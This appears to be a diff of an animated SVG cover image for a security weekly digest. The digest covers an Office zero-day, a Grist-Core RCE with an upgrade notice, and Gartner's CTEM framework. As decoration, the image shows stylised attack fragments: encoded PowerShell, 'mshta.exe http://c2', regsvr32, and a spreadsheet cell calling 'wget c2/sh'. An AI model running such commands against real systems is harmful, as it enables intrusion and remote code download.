+  <animate attributeName="opacity" values="0.7;1;0.7" dur="1.0s" repeatCount="indefinite"/>
+</polygon>
+
+<!-- Terminal shell execution -->
+<g transform="translate(382,196)" filter="url(#softShadow)">
+  <rect x="0" y="0" width="216" height="128" rx="8" ry="8" fill="url(#termBg)" stroke="#30C060" stroke-width="1.5"/>
+  <rect x="0" y="0" width="216" height="22" rx="8" ry="0" fill="#1A2332"/>
+  <rect x="0" y="14" width="216" height="8" fill="#1A2332"/>
+  <circle cx="14" cy="11" r="4" fill="#E63946"/>
+  <circle cx="28" cy="11" r="4" fill="#FFD166"/>
+  <circle cx="42" cy="11" r="4" fill="#06D6A0"/>
+  <text x="86" y="15" font-family="Helvetica, Arial, sans-serif" font-size="10" fill="#7DA3D9">cmd.exe</text>
+  <text x="10" y="40" font-family="Monaco, monospace" font-size="10" fill="#30C060">C:\&gt; powershell.exe</text>
+  <text x="10" y="56" font-family="Monaco, monospace" font-size="10" fill="#30C060">  -EncodedCommand</text>
+  <text x="10" y="72" font-family="Monaco, monospace" font-size="10" fill="#FFD166">  b64payload</text>
+  <text x="10" y="88" font-family="Monaco, monospace" font-size="10" fill="#E63946">mshta.exe http://c2</text>
+  <text x="10" y="106" font-family="Monaco, monospace" font-size="9" fill="#8338EC">regsvr32.exe /u /s</text>
+  <text x="10" y="122" font-family="Monaco, monospace" font-size="10" fill="#30C060">
+    <animate attributeName="opacity" values="0;1;0" dur="1.1s" repeatCount="indefinite"/>_</text>
+</g>
+
+<!-- C2 exfil bar -->
+<g transform="translate(56,334)">
+  <rect x="0" y="0" width="540" height="72" rx="8" ry="8" fill="#120810" stroke="#8338EC" stroke-width="1.4"/>
+  <text x="16" y="22" font-family="Monaco, monospace" font-size="11" fill="#8338EC" font-weight="700">C2 CHANNEL  &gt;&gt;  DATA EXFIL</text>
+  <rect x="16" y="30" width="508" height="6" rx="3" fill="#1A0A2E" stroke="#8338EC" stroke-width="0.8"/>
+  <rect x="16" y="30" width="40" height="6" rx="3" fill="#8338EC">
+    <animate attributeName="x" values="16;484;16" dur="2.8s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0.9;0.6;0.9" dur="2.8s" repeatCount="indefinite"/>
+  </rect>
+  <rect x="100" y="30" width="28" height="6" rx="3" fill="#6020C8" opacity="0.7">
+    <animate attributeName="x" values="100;460;16;100" dur="3.6s" repeatCount="indefinite"/>
+  </rect>
+  <text x="16" y="60" font-family="Helvetica, Arial, sans-serif" font-size="10" fill="#7DA3D9">T1566.001 Spearphishing</text>
+  <text x="190" y="60" font-family="Helvetica, Arial, sans-serif" font-size="10" fill="#7DA3D9">T1059.001 PowerShell</text>
+  <text x="368" y="60" font-family="Helvetica, Arial, sans-serif" font-size="10" fill="#7DA3D9">T1041 C2 Exfil</text>
+</g>
+
+<!-- KPI cards row -->
+<g transform="translate(54,422)">
+  <!-- CVSS card -->
+  <rect x="0" y="0" width="168" height="58" rx="8" ry="8" fill="#1A0A12" stroke="#E63946" stroke-width="1.5"/>
+  <text x="12" y="22" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#FF6B80" font-weight="700" letter-spacing="1.5">CVSS 3.1</text>
+  <text x="12" y="48" font-family="Helvetica, Arial, sans-serif" font-size="30" font-weight="800" fill="#E63946" filter="url(#txtGlow)">7.8</text>
+  <text x="64" y="48" font-family="Helvetica, Arial, sans-serif" font-size="14" fill="#CBD5E1" font-weight="600">HIGH</text>
+</g>
+<g transform="translate(236,422)">
+  <!-- EPSS card -->
+  <rect x="0" y="0" width="168" height="58" rx="8" ry="8" fill="#1A0A12" stroke="#FF4757" stroke-width="1.5"/>
+  <text x="12" y="22" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#FF6B80" font-weight="700" letter-spacing="1.5">EPSS</text>
+  <text x="12" y="48" font-family="Helvetica, Arial, sans-serif" font-size="28" font-weight="800" fill="#FF4757" filter="url(#txtGlow)">84.7%</text>
+</g>
+<g transform="translate(418,422)">
+  <!-- Patch card -->
+  <rect x="0" y="0" width="168" height="58" rx="8" ry="8" fill="#0A1A0E" stroke="#06D6A0" stroke-width="1.5"/>
+  <text x="12" y="22" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#06D6A0" font-weight="700" letter-spacing="1.5">PATCH</text>
+  <text x="12" y="46" font-family="Helvetica, Arial, sans-serif" font-size="17" font-weight="800" fill="#06D6A0">KB5034173</text>
+</g>
+
+<!-- Hero footer tag -->
+<g transform="translate(54,500)">
+  <rect x="0" y="0" width="192" height="24" rx="3" fill="#E63946" opacity="0.95"/>
+  <text x="10" y="17" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#FFF5F5">ACTIVE IN-THE-WILD EXPLOIT</text>
+</g>
+<text x="262" y="517" font-family="Helvetica, Arial, sans-serif" font-size="13" fill="#8FA3B8" font-style="italic">Microsoft  /  Jan 27, 2026</text>
+
+<!-- Affected products note -->
+<text x="54" y="545" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#7DA3D9">Affects: Office 2019, 2021, Microsoft 365 (DOCX / XLSX / PPTX)</text>
+
+<!-- ================== TOP RIGHT: Grist Core RCE ================== -->
+<rect x="652" y="80" width="516" height="248" rx="14" ry="14" fill="url(#tr1Grad)" stroke="#FF6B35" stroke-width="1.6" opacity="0.98"/>
+<rect x="652" y="80" width="516" height="4" fill="#FF6B35">
+  <animate attributeName="opacity" values="0.5;1;0.5" dur="4.1s" repeatCount="indefinite"/>
+</rect>
+
+<text x="672" y="112" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#FF8C5A" letter-spacing="3">HIGH  /  RCE  /  PoC AVAILABLE</text>
+<text x="672" y="140" font-family="Helvetica, Arial, sans-serif" font-size="24" font-weight="800" fill="#F8FAFC" filter="url(#txtGlow)">Grist-Core RCE</text>
+<text x="672" y="160" font-family="Helvetica, Arial, sans-serif" font-size="13" fill="#CBD5E1">Open-source spreadsheet remote code execution</text>
+
+<!-- Spreadsheet grid with injected cell -->
+<g transform="translate(672,172)">
+  <rect x="0" y="0" width="204" height="56" rx="4" ry="4" fill="#1A1428" stroke="#FF6B35" stroke-width="1.2"/>
+  <rect x="0" y="0" width="32" height="56" fill="#221836" rx="4" ry="0"/>
+  <text x="8" y="18" font-family="Monaco, monospace" font-size="9" fill="#8FA3B8">A</text>
+  <text x="8" y="34" font-family="Monaco, monospace" font-size="9" fill="#8FA3B8">B</text>
+  <text x="8" y="50" font-family="Monaco, monospace" font-size="9" fill="#8FA3B8">C</text>
+  <text x="38" y="18" font-family="Monaco, monospace" font-size="9" fill="#7DA3D9">budget_2026</text>
+  <text x="38" y="34" font-family="Monaco, monospace" font-size="9" fill="#7DA3D9">report_Q1</text>
+  <rect x="32" y="40" width="172" height="16" fill="#3A0A18" stroke="#FF6B35" stroke-width="1">
+    <animate attributeName="fill" values="#3A0A18;#5A1228;#3A0A18" dur="2.0s" repeatCount="indefinite"/>
+  </rect>
+  <text x="36" y="52" font-family="Monaco, monospace" font-size="9" fill="#FF6B35">=SYSTEM("wget c2/sh")</text>
+</g>
+
+<!-- Arrow to RCE burst -->
+<path d="M886,202 L928,202" stroke="#FF6B35" stroke-width="1.8" fill="none" stroke-dasharray="4 3">
+  <animate attributeName="stroke-dashoffset" values="0;-14" dur="1.0s" repeatCount="indefinite"/>
+</path>
+<polygon points="928,198 938,202 928,206" fill="#FF6B35"/>
+
+<!-- RCE burst circle -->
+<g transform="translate(940,182)">
+  <circle cx="30" cy="30" r="28" fill="#2A0E18" stroke="#FF6B35" stroke-width="2">
+    <animate attributeName="r" values="26;32;26" dur="2.2s" repeatCount="indefinite"/>
+    <animate attributeName="stroke-width" values="1.5;3;1.5" dur="2.2s" repeatCount="indefinite"/>
+  </circle>
+  <text x="8" y="26" font-family="Helvetica, Arial, sans-serif" font-size="10" font-weight="800" fill="#FF6B35">RCE</text>
+  <text x="10" y="40" font-family="Helvetica, Arial, sans-serif" font-size="9" fill="#CBD5E1">EXEC</text>
+  <g stroke="#FF6B35" stroke-width="1.2" opacity="0.7">
+    <line x1="30" y1="-4" x2="30" y2="-12"><animate attributeName="opacity" values="0.4;1;0.4" dur="1.5s" repeatCount="indefinite"/></line>
+    <line x1="62" y1="30" x2="70" y2="30"><animate attributeName="opacity" values="0.4;1;0.4" dur="1.7s" repeatCount="indefinite"/></line>
+    <line x1="30" y1="62" x2="30" y2="70"><animate attributeName="opacity" values="0.4;1;0.4" dur="1.9s" repeatCount="indefinite"/></line>
+    <line x1="-4" y1="30" x2="-12" y2="30"><animate attributeName="opacity" values="0.4;1;0.4" dur="1.3s" repeatCount="indefinite"/></line>
+    <line x1="52" y1="6" x2="58" y2="0"><animate attributeName="opacity" values="0.3;0.9;0.3" dur="2.1s" repeatCount="indefinite"/></line>
+    <line x1="52" y1="54" x2="58" y2="60"><animate attributeName="opacity" values="0.3;0.9;0.3" dur="2.4s" repeatCount="indefinite"/></line>
   </g>
+</g>
 
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
+<!-- Fix KPI -->
+<g transform="translate(672,246)">
+  <rect x="0" y="0" width="480" height="68" rx="8" ry="8" fill="#1A1020" stroke="#FF6B35" stroke-width="1.2"/>
+  <text x="14" y="24" font-family="Helvetica, Arial, sans-serif" font-size="12" fill="#FF8C5A" font-weight="700" letter-spacing="1">REMEDIATION</text>
+  <text x="14" y="50" font-family="Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F8FAFC">Upgrade to v1.1.15+</text>
+  <text x="220" y="50" font-family="Helvetica, Arial, sans-serif" font-size="13" fill="#8FA3B8"> — PoC in wild, patch now</text>
+  <rect x="450" y="10" width="20" height="48" rx="4" fill="#E63946" opacity="0.9">
+    <animate attributeName="opacity" values="0.7;1;0.7" dur="2.0s" repeatCount="indefinite"/>
+  </rect>
+</g>
 
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
+<!-- ================== BOTTOM RIGHT: CTEM Framework ================== -->
+<rect x="652" y="344" width="516" height="246" rx="14" ry="14" fill="url(#br1Grad)" stroke="#06D6A0" stroke-width="1.6" opacity="0.98"/>
+<rect x="652" y="344" width="516" height="4" fill="#06D6A0">
+  <animate attributeName="opacity" values="0.45;1;0.45" dur="5.2s" repeatCount="indefinite"/>
+</rect>
+
+<text x="672" y="376" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#06D6A0" letter-spacing="3">GARTNER  /  BEST PRACTICE</text>
+<text x="672" y="402" font-family="Helvetica, Arial, sans-serif" font-size="24" font-weight="800" fill="#F8FAFC" filter="url(#txtGlow)">CTEM Framework</text>
+<text x="672" y="420" font-family="Helvetica, Arial, sans-serif" font-size="13" fill="#A5B8C8">Continuous Threat Exposure Management — 5 stages</text>
+
+<!-- CTEM 5-stage horizontal bars -->
+<g transform="translate(672,434)">
+  <rect x="0" y="0" width="490" height="16" rx="3" fill="#0A2010" opacity="0.5"/>
+  <rect x="0" y="0" width="82" height="16" rx="3" fill="url(#ctemBar1)" opacity="0.9">
+    <animate attributeName="opacity" values="0.7;1;0.7" dur="3.5s" repeatCount="indefinite"/>
+  </rect>
+  <text x="88" y="13" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#CBD5E1" font-weight="600">01 Scoping</text>
+
+  <rect x="0" y="22" width="490" height="16" rx="3" fill="#0A2010" opacity="0.5"/>
+  <rect x="0" y="22" width="145" height="16" rx="3" fill="url(#ctemBar2)" opacity="0.9">
+    <animate attributeName="opacity" values="0.7;1;0.7" dur="4.0s" repeatCount="indefinite"/>
+  </rect>
+  <text x="151" y="35" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#CBD5E1" font-weight="600">02 Discovery</text>
+
+  <rect x="0" y="44" width="490" height="16" rx="3" fill="#0A2010" opacity="0.5"/>
+  <rect x="0" y="44" width="228" height="16" rx="3" fill="url(#ctemBar3)" opacity="0.9">
+    <animate attributeName="opacity" values="0.7;1;0.7" dur="4.5s" repeatCount="indefinite"/>
+  </rect>
+  <text x="234" y="57" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#CBD5E1" font-weight="600">03 Prioritization</text>
+
+  <rect x="0" y="66" width="490" height="16" rx="3" fill="#0A2010" opacity="0.5"/>
+  <rect x="0" y="66" width="318" height="16" rx="3" fill="url(#ctemBar4)" opacity="0.9">
+    <animate attributeName="opacity" values="0.7;1;0.7" dur="5.0s" repeatCount="indefinite"/>
+  </rect>
+  <text x="324" y="79" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#CBD5E1" font-weight="600">04 Validation</text>
+
+  <rect x="0" y="88" width="490" height="16" rx="3" fill="#0A2010" opacity="0.5"/>
+  <rect x="0" y="88" width="490" height="16" rx="3" fill="url(#ctemBar5)" opacity="0.85">
+    <animate attributeName="opacity" values="0.65;1;0.65" dur="5.5s" repeatCount="indefinite"/>
+  </rect>
+  <text x="10" y="101" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#F8FAFC" font-weight="700">05 Mobilization</text>
+</g>
+
+<!-- CTEM source tag -->
+<g transform="translate(672,546)">
+  <rect x="0" y="0" width="148" height="22" rx="3" fill="#0A2018" stroke="#06D6A0" stroke-width="1"/>
+  <text x="8" y="15" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#06D6A0">Gartner Best Practice</text>
+</g>
+<text x="832" y="561" font-family="Helvetica, Arial, sans-serif" font-size="12" fill="#7DA3D9" font-style="italic">Splunk / CrowdStrike EDR  /  2026</text>
+
+<!-- ================== FOOTER ================== -->
+<rect x="0" y="596" width="1200" height="34" fill="#030810" opacity="0.92"/>
+<text x="36" y="618" font-family="Helvetica, Arial, sans-serif" font-size="12" fill="#5A7090" letter-spacing="1">tech.2twodragon.com</text>
+<text x="1164" y="618" font-family="Helvetica, Arial, sans-serif" font-size="11" fill="#5A7090" text-anchor="end" letter-spacing="1">Security Weekly  |  Jan 28, 2026</text>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/01/28/Tech_Security_Weekly_Digest_MS_Office_Zero_Day_CTEM_Grist_Core_RCE/ : 45x45 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(1.866667)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM14 0h2v1h-2zM17 0h4v1h-4zM22 0h1v1h-1zM25 0h3v1h-3zM29 0h2v1h-2zM33 0h1v1h-1zM36 0h1v1h-1zM38 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM9 1h1v1h-1zM11 1h1v1h-1zM13 1h3v1h-3zM17 1h1v1h-1zM19 1h3v1h-3zM26 1h3v1h-3zM30 1h1v1h-1zM35 1h1v1h-1zM38 1h1v1h-1zM44 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM9 2h2v1h-2zM16 2h1v1h-1zM18 2h6v1h-6zM25 2h4v1h-4zM32 2h1v1h-1zM35 2h1v1h-1zM38 2h1v1h-1zM40 2h3v1h-3zM44 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM10 3h1v1h-1zM13 3h1v1h-1zM20 3h3v1h-3zM24 3h1v1h-1zM26 3h1v1h-1zM30 3h1v1h-1zM35 3h2v1h-2zM38 3h1v1h-1zM40 3h3v1h-3zM44 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM11 4h2v1h-2zM15 4h3v1h-3zM20 4h12v1h-12zM33 4h4v1h-4zM38 4h1v1h-1zM40 4h3v1h-3zM44 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h2v1h-2zM11 5h1v1h-1zM13 5h1v1h-1zM15 5h1v1h-1zM17 5h4v1h-4zM24 5h3v1h-3zM28 5h2v1h-2zM31 5h2v1h-2zM38 5h1v1h-1zM44 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h1v1h-1zM36 6h1v1h-1zM38 6h7v1h-7zM9 7h1v1h-1zM12 7h1v1h-1zM14 7h7v1h-7zM24 7h1v1h-1zM27 7h1v1h-1zM30 7h2v1h-2zM34 7h2v1h-2zM0 8h1v1h-1zM3 8h1v1h-1zM5 8h2v1h-2zM8 8h3v1h-3zM13 8h1v1h-1zM19 8h7v1h-7zM27 8h2v1h-2zM31 8h1v1h-1zM34 8h1v1h-1zM37 8h1v1h-1zM39 8h1v1h-1zM2 9h2v1h-2zM5 9h1v1h-1zM7 9h1v1h-1zM15 9h3v1h-3zM20 9h2v1h-2zM27 9h2v1h-2zM32 9h1v1h-1zM37 9h1v1h-1zM40 9h1v1h-1zM44 9h1v1h-1zM1 10h4v1h-4zM6 10h2v1h-2zM9 10h4v1h-4zM16 10h1v1h-1zM18 10h1v1h-1zM20 10h1v1h-1zM22 10h1v1h-1zM24 10h2v1h-2zM30 10h3v1h-3zM34 10h3v1h-3zM42 10h1v1h-1zM44 10h1v1h-1zM3 11h1v1h-1zM5 11h1v1h-1zM7 11h1v1h-1zM9 11h2v1h-2zM12 11h2v1h-2zM19 11h2v1h-2zM23 11h1v1h-1zM25 11h5v1h-5zM31 11h1v1h-1zM33 11h1v1h-1zM35 11h1v1h-1zM37 11h3v1h-3zM41 11h1v1h-1zM43 11h2v1h-2zM2 12h1v1h-1zM4 12h4v1h-4zM11 12h2v1h-2zM14 12h1v1h-1zM16 12h5v1h-5zM24 12h2v1h-2zM28 12h3v1h-3zM32 12h1v1h-1zM34 12h2v1h-2zM38 12h4v1h-4zM0 13h2v1h-2zM3 13h1v1h-1zM5 13h1v1h-1zM9 13h5v1h-5zM16 13h3v1h-3zM24 13h2v1h-2zM28 13h1v1h-1zM33 13h3v1h-3zM41 13h3v1h-3zM0 14h2v1h-2zM4 14h3v1h-3zM12 14h1v1h-1zM14 14h3v1h-3zM18 14h1v1h-1zM20 14h1v1h-1zM24 14h1v1h-1zM26 14h3v1h-3zM30 14h1v1h-1zM32 14h2v1h-2zM37 14h3v1h-3zM43 14h1v1h-1zM0 15h1v1h-1zM2 15h1v1h-1zM4 15h2v1h-2zM7 15h2v1h-2zM10 15h2v1h-2zM13 15h1v1h-1zM16 15h1v1h-1zM18 15h1v1h-1zM22 15h1v1h-1zM27 15h2v1h-2zM32 15h2v1h-2zM36 15h1v1h-1zM39 15h1v1h-1zM44 15h1v1h-1zM6 16h2v1h-2zM9 16h1v1h-1zM12 16h1v1h-1zM15 16h1v1h-1zM17 16h4v1h-4zM23 16h2v1h-2zM26 16h2v1h-2zM30 16h6v1h-6zM37 16h3v1h-3zM43 16h2v1h-2zM0 17h1v1h-1zM2 17h1v1h-1zM7 17h2v1h-2zM10 17h2v1h-2zM14 17h1v1h-1zM16 17h1v1h-1zM18 17h1v1h-1zM20 17h2v1h-2zM23 17h2v1h-2zM26 17h1v1h-1zM29 17h1v1h-1zM31 17h1v1h-1zM35 17h1v1h-1zM38 17h1v1h-1zM40 17h2v1h-2zM43 17h1v1h-1zM0 18h4v1h-4zM6 18h2v1h-2zM11 18h2v1h-2zM14 18h1v1h-1zM16 18h1v1h-1zM19 18h3v1h-3zM23 18h4v1h-4zM29 18h1v1h-1zM31 18h1v1h-1zM33 18h1v1h-1zM35 18h1v1h-1zM39 18h1v1h-1zM42 18h3v1h-3zM3 19h1v1h-1zM7 19h5v1h-5zM13 19h2v1h-2zM19 19h1v1h-1zM22 19h1v1h-1zM25 19h2v1h-2zM28 19h1v1h-1zM31 19h2v1h-2zM34 19h1v1h-1zM36 19h2v1h-2zM43 19h1v1h-1zM0 20h1v1h-1zM3 20h6v1h-6zM10 20h2v1h-2zM13 20h2v1h-2zM16 20h1v1h-1zM18 20h7v1h-7zM26 20h6v1h-6zM34 20h1v1h-1zM36 20h8v1h-8zM0 21h5v1h-5zM8 21h1v1h-1zM10 21h3v1h-3zM16 21h1v1h-1zM19 21h2v1h-2zM24 21h1v1h-1zM26 21h2v1h-2zM32 21h1v1h-1zM36 21h1v1h-1zM40 21h1v1h-1zM44 21h1v1h-1zM2 22h3v1h-3zM6 22h1v1h-1zM8 22h2v1h-2zM11 22h1v1h-1zM13 22h1v1h-1zM18 22h3v1h-3zM22 22h1v1h-1zM24 22h3v1h-3zM28 22h1v1h-1zM33 22h1v1h-1zM35 22h2v1h-2zM38 22h1v1h-1zM40 22h1v1h-1zM42 22h1v1h-1zM44 22h1v1h-1zM1 23h1v1h-1zM3 23h2v1h-2zM8 23h1v1h-1zM11 23h1v1h-1zM13 23h1v1h-1zM17 23h1v1h-1zM20 23h1v1h-1zM24 23h1v1h-1zM26 23h1v1h-1zM28 23h3v1h-3zM32 23h1v1h-1zM36 23h1v1h-1zM40 23h2v1h-2zM0 24h1v1h-1zM4 24h6v1h-6zM11 24h1v1h-1zM13 24h2v1h-2zM16 24h1v1h-1zM18 24h1v1h-1zM20 24h6v1h-6zM27 24h3v1h-3zM31 24h11v1h-11zM44 24h1v1h-1zM3 25h2v1h-2zM7 25h1v1h-1zM9 25h2v1h-2zM13 25h1v1h-1zM15 25h2v1h-2zM19 25h1v1h-1zM21 25h1v1h-1zM25 25h1v1h-1zM27 25h2v1h-2zM31 25h1v1h-1zM34 25h2v1h-2zM37 25h5v1h-5zM44 25h1v1h-1zM0 26h3v1h-3zM6 26h7v1h-7zM14 26h1v1h-1zM17 26h2v1h-2zM20 26h1v1h-1zM23 26h1v1h-1zM26 26h4v1h-4zM31 26h2v1h-2zM36 26h2v1h-2zM43 26h1v1h-1zM4 27h2v1h-2zM7 27h2v1h-2zM10 27h1v1h-1zM16 27h2v1h-2zM19 27h2v1h-2zM23 27h1v1h-1zM27 27h1v1h-1zM30 27h1v1h-1zM32 27h2v1h-2zM36 27h1v1h-1zM38 27h2v1h-2zM41 27h1v1h-1zM43 27h1v1h-1zM0 28h1v1h-1zM6 28h1v1h-1zM8 28h4v1h-4zM14 28h1v1h-1zM20 28h2v1h-2zM26 28h2v1h-2zM29 28h1v1h-1zM31 28h3v1h-3zM37 28h1v1h-1zM39 28h2v1h-2zM43 28h2v1h-2zM0 29h2v1h-2zM3 29h1v1h-1zM7 29h3v1h-3zM12 29h1v1h-1zM14 29h2v1h-2zM18 29h2v1h-2zM22 29h3v1h-3zM26 29h1v1h-1zM28 29h2v1h-2zM31 29h1v1h-1zM33 29h1v1h-1zM35 29h3v1h-3zM41 29h4v1h-4zM1 30h1v1h-1zM3 30h4v1h-4zM8 30h4v1h-4zM13 30h2v1h-2zM16 30h1v1h-1zM19 30h3v1h-3zM24 30h1v1h-1zM28 30h3v1h-3zM32 30h1v1h-1zM36 30h1v1h-1zM38 30h1v1h-1zM40 30h1v1h-1zM42 30h3v1h-3zM1 31h2v1h-2zM7 31h1v1h-1zM10 31h1v1h-1zM12 31h2v1h-2zM17 31h1v1h-1zM19 31h2v1h-2zM24 31h4v1h-4zM32 31h1v1h-1zM34 31h1v1h-1zM38 31h3v1h-3zM43 31h2v1h-2zM0 32h2v1h-2zM4 32h3v1h-3zM12 32h2v1h-2zM15 32h2v1h-2zM18 32h2v1h-2zM21 32h3v1h-3zM25 32h4v1h-4zM34 32h3v1h-3zM39 32h2v1h-2zM43 32h2v1h-2zM2 33h3v1h-3zM7 33h6v1h-6zM15 33h1v1h-1zM18 33h3v1h-3zM24 33h1v1h-1zM27 33h2v1h-2zM31 33h1v1h-1zM36 33h3v1h-3zM43 33h2v1h-2zM4 34h1v1h-1zM6 34h1v1h-1zM8 34h3v1h-3zM16 34h2v1h-2zM19 34h1v1h-1zM26 34h2v1h-2zM31 34h1v1h-1zM33 34h1v1h-1zM36 34h4v1h-4zM41 34h2v1h-2zM44 34h1v1h-1zM1 35h4v1h-4zM10 35h5v1h-5zM17 35h2v1h-2zM23 35h1v1h-1zM25 35h5v1h-5zM31 35h1v1h-1zM34 35h2v1h-2zM40 35h2v1h-2zM44 35h1v1h-1zM0 36h1v1h-1zM3 36h2v1h-2zM6 36h1v1h-1zM8 36h1v1h-1zM12 36h2v1h-2zM18 36h16v1h-16zM36 36h5v1h-5zM42 36h3v1h-3zM8 37h1v1h-1zM13 37h1v1h-1zM15 37h1v1h-1zM17 37h1v1h-1zM19 37h2v1h-2zM24 37h1v1h-1zM31 37h2v1h-2zM34 37h1v1h-1zM36 37h1v1h-1zM40 37h1v1h-1zM43 37h2v1h-2zM0 38h7v1h-7zM10 38h2v1h-2zM14 38h1v1h-1zM17 38h4v1h-4zM22 38h1v1h-1zM24 38h2v1h-2zM28 38h2v1h-2zM34 38h1v1h-1zM36 38h1v1h-1zM38 38h1v1h-1zM40 38h4v1h-4zM0 39h1v1h-1zM6 39h1v1h-1zM8 39h3v1h-3zM15 39h1v1h-1zM18 39h1v1h-1zM20 39h1v1h-1zM24 39h1v1h-1zM26 39h3v1h-3zM31 39h1v1h-1zM33 39h1v1h-1zM36 39h1v1h-1zM40 39h1v1h-1zM44 39h1v1h-1zM0 40h1v1h-1zM2 40h3v1h-3zM6 40h1v1h-1zM9 40h1v1h-1zM12 40h4v1h-4zM17 40h1v1h-1zM19 40h6v1h-6zM27 40h1v1h-1zM32 40h10v1h-10zM0 41h1v1h-1zM2 41h3v1h-3zM6 41h1v1h-1zM8 41h3v1h-3zM12 41h2v1h-2zM16 41h1v1h-1zM19 41h3v1h-3zM24 41h1v1h-1zM26 41h1v1h-1zM28 41h2v1h-2zM36 41h2v1h-2zM41 41h2v1h-2zM0 42h1v1h-1zM2 42h3v1h-3zM6 42h1v1h-1zM9 42h2v1h-2zM12 42h1v1h-1zM14 42h4v1h-4zM19 42h4v1h-4zM27 42h1v1h-1zM31 42h1v1h-1zM35 42h7v1h-7zM43 42h2v1h-2zM0 43h1v1h-1zM6 43h1v1h-1zM9 43h3v1h-3zM13 43h1v1h-1zM15 43h1v1h-1zM17 43h2v1h-2zM20 43h1v1h-1zM24 43h1v1h-1zM27 43h3v1h-3zM31 43h2v1h-2zM35 43h3v1h-3zM40 43h2v1h-2zM0 44h7v1h-7zM8 44h1v1h-1zM12 44h4v1h-4zM18 44h2v1h-2zM21 44h1v1h-1zM24 44h6v1h-6zM33 44h1v1h-1zM35 44h2v1h-2zM38 44h1v1h-1zM43 44h1v1h-1z"/>
   </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">January 28, 2026</text>
-
-  <!-- Card 1: ZERO-DAY -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#ef4444" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">CVE</text>
-  </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">ZERO-DAY</text>
-  <!-- Card 2: CVE-2026-215 -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">CVE</text>
-  </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">CVE-2026-215</text>
-  <!-- Card 3: SEC OPS -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">SEC OPS</text>
-  <!-- Card 4: CVE PATCH -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
